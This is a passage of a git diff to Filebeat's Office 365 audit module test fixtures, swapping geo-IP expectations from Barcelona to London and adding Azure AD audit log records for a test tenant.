 "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30",
 "o365.audit.Workload": "OneDrive",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "213.97.47.133",
+ "related.ip": "81.2.69.143",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
+ "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "213.97.47.133",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
 "tags": [
 "forwarded"
 ],
@@ -165,8 +161,8 @@
 },
 {
 "@timestamp": "2020-02-07T16:44:08.000Z",
- "client.address": "213.97.47.133",
- "client.ip": "213.97.47.133",
+ "client.address": "81.2.69.143",
+ "client.ip": "81.2.69.143",
 "event.action": "FileAccessed",
 "event.category": "file",
 "event.code": "SharePointFileOperation",
@@ -184,9 +180,9 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 2260,
+ "log.offset": 2256,
 "network.type": "ipv4",
- "o365.audit.ClientIP": "213.97.47.133",
+ "o365.audit.ClientIP": "81.2.69.143",
 "o365.audit.CorrelationId": "652b339f-90a0-a000-f25f-919afc141eb1",
 "o365.audit.CreationTime": "2020-02-07T16:44:08",
 "o365.audit.EventSource": "SharePoint",
@@ -211,20 +207,18 @@
 "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30",
 "o365.audit.Workload": "OneDrive",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "213.97.47.133",
+ "related.ip": "81.2.69.143",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
+ "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "213.97.47.133",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
 "tags": [
 "forwarded"
 ],
@@ -247,8 +241,8 @@
 },
 {
 "@timestamp": "2020-02-07T16:44:08.000Z",
- "client.address": "213.97.47.133",
- "client.ip": "213.97.47.133",
+ "client.address": "81.2.69.143",
+ "client.ip": "81.2.69.143",
 "event.action": "FileAccessed",
 "event.category": "file",
 "event.code": "SharePointFileOperation",
@@ -266,9 +260,9 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 3346,
+ "log.offset": 3340,
 "network.type": "ipv4",
- "o365.audit.ClientIP": "213.97.47.133",
+ "o365.audit.ClientIP": "81.2.69.143",
 "o365.audit.CorrelationId": "652b339f-90a0-a000-f25f-919afc141eb1",
 "o365.audit.CreationTime": "2020-02-07T16:44:08",
 "o365.audit.EventSource": "SharePoint",
@@ -293,20 +287,18 @@
 "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30",
 "o365.audit.Workload": "OneDrive",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "213.97.47.133",
+ "related.ip": "81.2.69.143",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
+ "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "213.97.47.133",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
 "tags": [
 "forwarded"
 ],
@@ -329,8 +321,8 @@
 },
 {
 "@timestamp": "2020-02-07T16:44:21.000Z",
- "client.address": "213.97.47.133",
- "client.ip": "213.97.47.133",
+ "client.address": "81.2.69.143",
+ "client.ip": "81.2.69.143",
 "event.action": "FileUploaded",
 "event.category": "file",
 "event.code": "SharePointFileOperation",
@@ -348,9 +340,9 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 4432,
+ "log.offset": 4424,
 "network.type": "ipv4",
- "o365.audit.ClientIP": "213.97.47.133",
+ "o365.audit.ClientIP": "81.2.69.143",
 "o365.audit.CorrelationId": "692b339f-c016-a000-f25f-990a07b2e011",
 "o365.audit.CreationTime": "2020-02-07T16:44:21",
 "o365.audit.EventSource": "SharePoint",
@@ -376,20 +368,18 @@ "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "o365.audit.Workload": "OneDrive", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "213.97.47.133", + "related.ip": "81.2.69.143", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "213.97.47.133", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "tags": [ "forwarded" ], @@ -412,8 +402,8 @@ }, { "@timestamp": "2020-02-07T16:44:23.000Z", - "client.address": "213.97.47.133", - "client.ip": "213.97.47.133", + "client.address": "81.2.69.143", + "client.ip": "81.2.69.143", "event.action": "FileModified", "event.category": "file", "event.code": "SharePointFileOperation", @@ -431,9 +421,9 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 5540, + "log.offset": 5530, "network.type": "ipv4", - "o365.audit.ClientIP": "213.97.47.133", + "o365.audit.ClientIP": "81.2.69.143", "o365.audit.CorrelationId": "692b339f-902e-a000-f25f-95def5f17903", "o365.audit.CreationTime": "2020-02-07T16:44:23", "o365.audit.EventSource": "SharePoint", 
@@ -458,20 +448,18 @@ "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "o365.audit.Workload": "OneDrive", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "213.97.47.133", + "related.ip": "81.2.69.143", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "213.97.47.133", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "tags": [ "forwarded" ], @@ -494,8 +482,8 @@ }, { "@timestamp": "2020-02-07T16:44:07.000Z", - "client.address": "213.97.47.133", - "client.ip": "213.97.47.133", + "client.address": "81.2.69.143", + "client.ip": "81.2.69.143", "event.action": "FileDeleted", "event.category": "file", "event.code": "SharePointFileOperation", @@ -513,9 +501,9 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 6625, + "log.offset": 6613, "network.type": "ipv4", - "o365.audit.ClientIP": "213.97.47.133", + "o365.audit.ClientIP": "81.2.69.143", "o365.audit.CorrelationId": "652b339f-908c-a000-f25f-91423da7dd9b", "o365.audit.CreationTime": "2020-02-07T16:44:07", "o365.audit.EventSource": "SharePoint", 
@@ -540,20 +528,18 @@ "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "o365.audit.Workload": "OneDrive", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "213.97.47.133", + "related.ip": "81.2.69.143", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "213.97.47.133", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "tags": [ "forwarded" ], @@ -576,8 +562,8 @@ }, { "@timestamp": "2020-02-07T16:44:21.000Z", - "client.address": "213.97.47.133", - "client.ip": "213.97.47.133", + "client.address": "81.2.69.143", + "client.ip": "81.2.69.143", "event.action": "FileUploaded", "event.category": "file", "event.code": "SharePointFileOperation", @@ -595,9 +581,9 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 7755, + "log.offset": 7741, "network.type": "ipv4", - "o365.audit.ClientIP": "213.97.47.133", + "o365.audit.ClientIP": "81.2.69.143", "o365.audit.CorrelationId": "692b339f-c016-a000-f25f-990a07b2e011", "o365.audit.CreationTime": "2020-02-07T16:44:21", "o365.audit.EventSource": "SharePoint", 
@@ -623,20 +609,18 @@ "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "o365.audit.Workload": "OneDrive", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "213.97.47.133", + "related.ip": "81.2.69.143", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "213.97.47.133", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "tags": [ "forwarded" ], @@ -659,8 +643,8 @@ }, { "@timestamp": "2020-02-07T16:44:23.000Z", - "client.address": "213.97.47.133", - "client.ip": "213.97.47.133", + "client.address": "81.2.69.143", + "client.ip": "81.2.69.143", "event.action": "FileModified", "event.category": "file", "event.code": "SharePointFileOperation", @@ -678,9 +662,9 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 8863, + "log.offset": 8847, "network.type": "ipv4", - "o365.audit.ClientIP": "213.97.47.133", + "o365.audit.ClientIP": "81.2.69.143", "o365.audit.CorrelationId": "692b339f-902e-a000-f25f-95def5f17903", "o365.audit.CreationTime": "2020-02-07T16:44:23", "o365.audit.EventSource": "SharePoint", 
@@ -705,20 +689,18 @@ "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "o365.audit.Workload": "OneDrive", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "213.97.47.133", + "related.ip": "81.2.69.143", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "213.97.47.133", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "tags": [ "forwarded" ], @@ -741,8 +723,8 @@ }, { "@timestamp": "2020-02-07T16:44:23.000Z", - "client.address": "213.97.47.133", - "client.ip": "213.97.47.133", + "client.address": "81.2.69.143", + "client.ip": "81.2.69.143", "event.action": "FileModified", "event.category": "file", "event.code": "SharePointFileOperation", @@ -760,9 +742,9 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 9948, + "log.offset": 9930, "network.type": "ipv4", - "o365.audit.ClientIP": "213.97.47.133", + "o365.audit.ClientIP": "81.2.69.143", "o365.audit.CorrelationId": "692b339f-902e-a000-f25f-95def5f17903", "o365.audit.CreationTime": "2020-02-07T16:44:23", "o365.audit.EventSource": "SharePoint", 
@@ -787,20 +769,18 @@ "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "o365.audit.Workload": "OneDrive", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "213.97.47.133", + "related.ip": "81.2.69.143", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "213.97.47.133", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "tags": [ "forwarded" ], @@ -823,8 +803,8 @@ }, { "@timestamp": "2020-02-07T16:44:23.000Z", - "client.address": "213.97.47.133", - "client.ip": "213.97.47.133", + "client.address": "81.2.69.143", + "client.ip": "81.2.69.143", "event.action": "FileModified", "event.category": "file", "event.code": "SharePointFileOperation", @@ -842,9 +822,9 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 11033, + "log.offset": 11013, "network.type": "ipv4", - "o365.audit.ClientIP": "213.97.47.133", + "o365.audit.ClientIP": "81.2.69.143", "o365.audit.CorrelationId": "692b339f-902e-a000-f25f-95def5f17903", "o365.audit.CreationTime": "2020-02-07T16:44:23", "o365.audit.EventSource": "SharePoint", 
@@ -869,20 +849,18 @@ "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "o365.audit.Workload": "OneDrive", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "213.97.47.133", + "related.ip": "81.2.69.143", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "213.97.47.133", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "tags": [ "forwarded" ], diff --git a/x-pack/filebeat/module/o365/audit/test/08-azuread-users.log b/x-pack/filebeat/module/o365/audit/test/08-azuread-users.log index a661456ee68f..a7ff346831e7 100644 --- a/x-pack/filebeat/module/o365/audit/test/08-azuread-users.log +++ b/x-pack/filebeat/module/o365/audit/test/08-azuread-users.log 
@@ -1,11 +1,11 @@ {"CreationTime":"2021-02-03T17:11:39","Id":"0e6ebaec-a3fc-4996-b06b-1fbc7c619afd","Operation":"Add service principal.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"Not Available","UserType":4,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"","ObjectId":"https:\/\/eu.prod.graph.ipc.msidentity.com\/;https:\/\/na.prod.graph.ipc.msidentity.com\/;https:\/\/ipcapi-us.azure.com\/;https:\/\/ipcapi-eu.azure.com;a3dfc3c6-2c7d-4f42-aeec-b2877f9bce97","UserId":"Certificate","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{}"},{"Name":"extendedAuditEventCategory","Value":"ServicePrincipal"}],"ModifiedProperties":[{"Name":"AccountEnabled","NewValue":"[\r\n true\r\n]","OldValue":"[]"},{"Name":"AppAddress","NewValue":"[\r\n {\r\n \"AddressType\": 0,\r\n \"Address\": \"https:\/\/na.prod.graph.ipc.msidentity.com\/\",\r\n \"ReplyAddressClientType\": 1,\r\n \"ReplyAddressIndex\": null,\r\n \"IsReplyAddressDefault\": false\r\n },\r\n {\r\n \"AddressType\": 0,\r\n \"Address\": \"https:\/\/eu.prod.graph.ipc.msidentity.com\/\",\r\n \"ReplyAddressClientType\": 1,\r\n \"ReplyAddressIndex\": null,\r\n \"IsReplyAddressDefault\": false\r\n }\r\n]","OldValue":"[]"},{"Name":"AppPrincipalId","NewValue":"[\r\n \"a3dfc3c6-2c7d-4f42-aeec-b2877f9bce97\"\r\n]","OldValue":"[]"},{"Name":"DisplayName","NewValue":"[\r\n \"Microsoft Azure AD Identity Protection\"\r\n]","OldValue":"[]"},{"Name":"ServicePrincipalName","NewValue":"[\r\n \"https:\/\/eu.prod.graph.ipc.msidentity.com\/\",\r\n \"https:\/\/na.prod.graph.ipc.msidentity.com\/\",\r\n \"https:\/\/ipcapi-us.azure.com\/\",\r\n \"https:\/\/ipcapi-eu.azure.com\",\r\n \"a3dfc3c6-2c7d-4f42-aeec-b2877f9bce97\"\r\n]","OldValue":"[]"},{"Name":"Credential","NewValue":"[\r\n {\r\n \"CredentialType\": 2,\r\n \"KeyStoreId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\",\r\n \"KeyGroupId\": \"3acaf972-707d-48d1-b6f0-32f604924b15\"\r\n 
}\r\n]","OldValue":"[]"},{"Name":"Included Updated Properties","NewValue":"AccountEnabled, AppAddress, AppPrincipalId, DisplayName, ServicePrincipalName, Credential","OldValue":""},{"Name":"TargetId.ServicePrincipalNames","NewValue":"https:\/\/eu.prod.graph.ipc.msidentity.com\/;https:\/\/na.prod.graph.ipc.msidentity.com\/;https:\/\/ipcapi-us.azure.com\/;https:\/\/ipcapi-eu.azure.com;a3dfc3c6-2c7d-4f42-aeec-b2877f9bce97","OldValue":""}],"Actor":[{"ID":"Microsoft Azure AD Internal - Jit Provisioning","Type":1},{"ID":"Certificate","Type":2},{"ID":"Other","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"","InterSystemsId":"b13fcc43-cd82-4316-b847-06d75c7d08db","IntraSystemId":"92264d74-e7e3-4a1f-8cc5-12b63707a298","SupportTicketId":"","Target":[{"ID":"ServicePrincipal_9d47c163-bf1f-45c5-9b7e-b7b5e88cf451","Type":2},{"ID":"9d47c163-bf1f-45c5-9b7e-b7b5e88cf451","Type":2},{"ID":"ServicePrincipal","Type":2},{"ID":"Microsoft Azure AD Identity Protection","Type":1},{"ID":"a3dfc3c6-2c7d-4f42-aeec-b2877f9bce97","Type":2},{"ID":"https:\/\/eu.prod.graph.ipc.msidentity.com\/;https:\/\/na.prod.graph.ipc.msidentity.com\/;https:\/\/ipcapi-us.azure.com\/;https:\/\/ipcapi-eu.azure.com;a3dfc3c6-2c7d-4f42-aeec-b2877f9bce97","Type":4}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"} {"CreationTime":"2021-02-04T16:00:05","Id":"2584fb28-a111-475e-ac4a-06e315585d80","Operation":"Add user.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"","ObjectId":"eve@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{}"},{"Name":"extendedAuditEventCategory","Value":"User"}],"ModifiedProperties":[{"Name":"AccountEnabled","NewValue":"[\r\n 
true\r\n]","OldValue":"[]"},{"Name":"AssignedLicense","NewValue":"[\r\n \"[SkuName=DEVELOPERPACK_E5, AccountId=48622b8f-44d3-420c-b4a2-510c8165767e, SkuId=c42b9cae-ea4f-4ab7-9717-81576235ccac, DisabledPlans=[]]\"\r\n]","OldValue":"[]"},{"Name":"AssignedPlan","NewValue":"[\r\n {\r\n \"SubscribedPlanId\": \"9f7d2ed6-52ad-424d-90ea-9342098a44d7\",\r\n \"ServiceInstance\": \"MIPExchangeSolutions\/NA001\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.7907608Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"cd31b152-6326-4d1b-ae1b-997b625182e6\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"60af8a66-a25d-4c4b-957c-168ffd3e899c\",\r\n \"ServiceInstance\": \"M365CommunicationCompliance\/NA001\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.7907608Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"a413a9ff-720c-4822-98ef-2f37c2a21f4c\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"6cb7c304-6614-4eb0-9d98-4b22abf159b8\",\r\n \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.7907608Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"a6520331-d7d4-4276-95f5-15c0933bc757\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"74efac17-838b-45e4-9a27-e254c18cbf31\",\r\n \"ServiceInstance\": \"ccibotsprod\/NA001\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.7907608Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"ded3d325-1bdc-453e-8432-5bac26d7a014\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"097833ec-fcf9-450d-af1a-b082c08a4fb1\",\r\n \"ServiceInstance\": \"CRM\/EMEA03\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.7907608Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"afa73018-811e-46e9-988f-f75d2b1b8430\"\r\n },\r\n {\r\n 
\"SubscribedPlanId\": \"f945c436-a3f4-4d81-90ee-e9528ce2fc74\",\r\n \"ServiceInstance\": \"ProjectProgramsAndPortfolios\/NA001\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.7907608Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"b21a6b06-1988-436e-a07b-51ec6d9f52ad\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"c28b4dd5-369a-42d2-bb9f-fdafbd262f44\",\r\n \"ServiceInstance\": \"Office365InsiderRisk\/NA001\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.7907608Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"d587c7a3-bda9-4f99-8776-9bcf59c84f75\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"3b96ba17-8812-402c-9cea-81ff2c810ff4\",\r\n \"ServiceInstance\": \"MicrosoftOffice\/NorthAmerica4\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.7907608Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"531ee2f8-b1cb-453b-9c21-d2180d014ca5\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"e6627090-24af-457e-94de-d92305556e7e\",\r\n \"ServiceInstance\": \"MicrosoftThreatProtection\/NA001\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.7907608Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"bf28f719-7844-4079-9c78-c1307898e192\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"4050e66b-bcb2-4335-84c4-2d3d1fc17565\",\r\n \"ServiceInstance\": \"CRM\/EMEA03\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.7907608Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"28b0fa46-c39a-4188-89e2-58e979a6b014\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"2c23dc2c-e96d-4226-970d-31d05c3d2f53\",\r\n \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.7907608Z\",\r\n \"InitialState\": null,\r\n \"Capability\": 
null,\r\n \"ServicePlanId\": \"199a5c09-e0ca-4e37-8f7c-b05d533e1ea2\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"e1b1e973-7b03-4d02-9fa5-ecc0924c6e21\",\r\n \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.7907608Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"65cc641f-cccd-4643-97e0-a17e3045e541\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"5de98343-29d4-4bd6-a426-70accc387e1d\",\r\n \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.7907608Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"d2d51368-76c9-4317-ada2-a12c004c432f\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"4a96ad76-6799-4d83-a032-abcc2677ff87\",\r\n \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.795755Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"9d0c4ee5-e4a1-4625-ab39-d82b619b1a34\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"f22df612-73ed-4b60-9a21-29ce24356e55\",\r\n \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.795755Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": \"e26c2fcc-ab91-4a61-b35c-03cdc8dddf66\"\r\n },\r\n {\r\n \"SubscribedPlanId\": \"f1620d43-b689-40e7-8be9-6f480ada0912\",\r\n \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n \"CapabilityStatus\": 0,\r\n \"AssignedTimestamp\": \"2021-02-04T16:00:04.795755Z\",\r\n \"InitialState\": null,\r\n \"Capability\": null,\r\n \"ServicePlanId\": 